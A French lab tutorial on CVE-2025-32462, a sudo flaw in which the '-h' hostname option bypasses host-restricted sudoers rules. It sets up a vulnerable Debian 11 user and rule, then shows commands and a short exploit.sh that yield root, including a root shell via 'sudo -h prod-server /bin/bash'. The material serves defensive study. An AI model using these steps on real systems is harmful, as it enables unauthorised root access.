
CVE-2025-32462 est une vulnérabilité d'élévation locale de privilèges dans sudo.
CVE-2025-32462 est une vulnérabilité d'élévation de privilèges locale dans sudo qui permet à un utilisateur faiblement privilégié d'exécuter des commandes en tant que root en abusant des règles sudo restreintes au nom d'hôte. Le problème réside dans la manière dont sudo gérait historiquement l'option -h (hôte) lors des contrôles d'autorisation.
Lorsqu'une règle sudoers est restreinte à un nom d'hôte spécifique, sudo ne devrait autoriser l'exécution que si le nom d'hôte du système correspond à la règle. En raison d'une logique défectueuse, les versions concernées faisaient confiance à un nom d'hôte fourni par l'utilisateur via sudo -h, permettant aux attaquants de contourner entièrement la restriction.
sudo permettait à l'argument -h <hostname> d'influencer les décisions d'autorisation. Dans les versions vulnérables, le nom d'hôte fourni était pris en compte lors de l'évaluation des règles sudoers, au lieu d'être strictement validé par rapport au véritable nom d'hôte du système.
Par conséquent, les restrictions sudo basées sur l'hôte pouvaient être contournées.
En cas d'exploitation réussie, un attaquant local peut :
Dans les environnements réels, cette vulnérabilité est particulièrement dangereuse dans :
| Composant | Détails |
|---|---|
| OS | Debian 11 (Bullseye – non corrigé) |
| Version de sudo | ≤ 1.9.13 |
| Niveau d'accès | Utilisateur local |
| Virtualisation | VirtualBox |
⚠️ Remarque : Les versions modernes d'Ubuntu et de Debian intègrent des correctifs rétroportés tout en conservant des chaînes de version similaires. Cette vulnérabilité ne peut pas être reproduite sur les systèmes corrigés.
sudo --version
Résultat attendu (vulnérable) :
Sudo version 1.9.5p2
sudo useradd -m attacker
sudo passwd attacker
groups attacker
Résultat attendu :
attacker : attacker
L'utilisateur ne doit pas appartenir au groupe sudo.
Modifier sudoers en toute sécurité :
sudo visudo
Ajouter la ligne suivante :
attacker prod-server = (root) ALL
prod-server est un faux nom d'hôteVérifier :
sudo -l -U attacker
Résultat attendu :
User attacker may run the following commands on prod-server:
(root) ALL
Changer d'utilisateur :
su - attacker
Tenter sudo normalement :
sudo id
Résultat attendu :
attacker is not allowed to run sudo on <hostname>
Déclencher la vulnérabilité :
sudo -h prod-server id
Sortie d'une exploitation réussie :
uid=0(root) gid=0(root) groups=0(root)
Ouvrir un shell root :
sudo -h prod-server /bin/bash
Vérifier :
id
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id
Enregistrer sous exploit.sh, le rendre exécutable, puis l'exécuter en tant qu'utilisateur attacker :
chmod +x exploit.sh
./exploit.sh
| Action | Résultat |
|---|---|
| sudo normal | ❌ Refusé |
sudo -h prod-server id | ✅ Root |
Cela confirme une élévation de privilèges réussie.
Les versions modernes d'Ubuntu semblent inclure des versions de sudo qui se situent dans la plage affectée. Cependant, Ubuntu a rétroporté le correctif de sécurité pour CVE‑2025‑32462 sans modifier la chaîne de version amont.
Par conséquent :
sudo -h n'influence plus les contrôles d'autorisationCela souligne l'importance de valider le statut de vulnérabilité à l'aide de tests comportementaux, et non uniquement des chaînes de version.
sudo vers une version corrigéeCe tutoriel est destiné uniquement à la recherche en sécurité à des fins pédagogiques et défensives. Ne testez pas cette vulnérabilité sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas l'autorisation explicite d'évaluer.